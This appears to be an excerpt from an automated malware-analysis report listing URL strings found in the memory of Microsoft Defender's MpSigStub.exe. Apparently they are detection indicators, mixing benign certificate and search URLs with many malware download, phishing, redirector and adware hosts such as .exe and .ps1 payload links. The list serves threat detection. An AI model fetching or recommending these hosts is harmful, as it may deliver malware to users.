Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://onescan.co.kr/
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: http://online-game-group.ru/download.php
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://pastie.org/stylesheets/embed.css
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://pcmaticplus.com/success.html
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: http://philippelaurent.org/rechnung/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://phimshock-share123vn.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://pic.sogou.com/pics?query=%s
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://picosoftnepal.net/ach-form/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://pilasto.host/po.exe
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: http://pilinno.info/cpi/promo.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ping.180solutions.com
Source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp String found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
Source: MpSigStub.exe, 0000000B.00000003.18318703518.0000021B5E146000.00000004.00000001.sdmp String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://plaintexw.com/xx.dll
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://play.videosongplayer.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://playsong.mediasongplayer.com/
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: http://plugin-install.info/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://plugin-installer.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://plugin-installer.info/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://pluginprovider.com/?rap
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://pmevents.co.in/nd/index.php)
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://polifile.co/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://post.medusaranch.com/abonento9.exe
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://private0091111.duckdns.org/qagj/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://product.mobogenie.com/pc/clientDownload.htm
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://psget.net/GetPsGet.ps1x
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://psvstats.info/hrtbbn/rwvski.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://psvstats.info/hrtbbn/rwvski.exedownload
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://psynergi.dk/data
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://pubs.vmware.com
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://pusat-hacing.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://qiiqur.com/frix.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://qim2bd2j.data-url.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://quantsa.ru/?de
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://qudaih.com/pzlnkda/nbsa
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/ie/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://r%d.clrsch.com/x
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://r.funmoods.com//
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://raa.qwepoii.org/v4/gtg/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://rapidshare.com/files/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://readlenta.ru/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://recoverpcerror.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://redirsystem32.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://redirsystem32.com/tds1/in.cgi?2&group=mp3
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://refud.me/scan.php
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://registrywizard.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://remote-keylogger.net
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://remove.gettango.com/
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://renatopaschoal.com.br/dropbox/
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://report.wallpaper.shqingzao.com
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://report.wallpaper.shqingzao.com~
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp String found in binary or memory: http://resource.aldtop.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://retssam.com/hm/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://rewards.getjar.com
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://rghost.net/download/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://risweg.com/flpaoql.exe
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://rl.ammyy.com
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://rmportal.bpweb.bp.comx
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://rocesi.com/mncejd.exe
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://rs-moto.ru/counter/?a=1
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://s-elisa.ru/data
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://s.earching.info/
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://s.earching.info/xA
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://s.symcd.com0_
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/119/pubid1008affid100800
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-143692468872/Installer.exe
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://s3.amazonaws.com/adpk/getsavin/getsavin.ini/noproxygetoksettingslocation2http://s3.amazonaws.
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://safesaver.net/
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://sandbaggersgolf.club/viewdoc/file.php?document=y2fzyxnqqgzlcnjlci5jb20=
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://santasalete.sp.gov.br/jss/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://saveasapp.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://sbrenind.com/niggab-x/niggab-x.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sc-cash.com
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: mpam-728dfe11.exe, 00000011.00000003.18581318930.0000027770032000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://scorpion-swan.com/lamba/loginpdf.html)/type/action/s/uri
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://screw-malwrhunterteam.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://script.shop-guide.co.kr/script/shopguide.php
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://sds.clrsch.com/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://sds.clrsch.com/x
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://sds.qckads.com/sidesearch/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://se.newcell.cn/Service.asmx
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://search.17173.com/index.jsp?keyword=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://search.btchina.net/search.php?query=%s
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/search?p=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://search.getwebcake.com/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://search.lycos.com/default.asp?src=clear
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://search.newhua.com/search.asp?Keyword=%s
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://search.psn.cn/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://search.shopnav.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://search.shopnav.com/_
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://secure4709.spaldingscpa.com/con/next.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://security-updater.com/binaries/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://seedstar.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://serbetcimimarlik.com/tests/folder/excell.php
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://service.pandtelectric.com/
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp String found in binary or memory: http://sf-addon.com/helper/setup/SaveFromNetHelper-Setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://shieldapps.com/eula/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://sp.whitetruem.com/g.php?d=
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sponsor01.info/08
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spotauditor.nsauditor.com
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sputnikmailru.cdnmail.ru/mailruhomesearch.exe
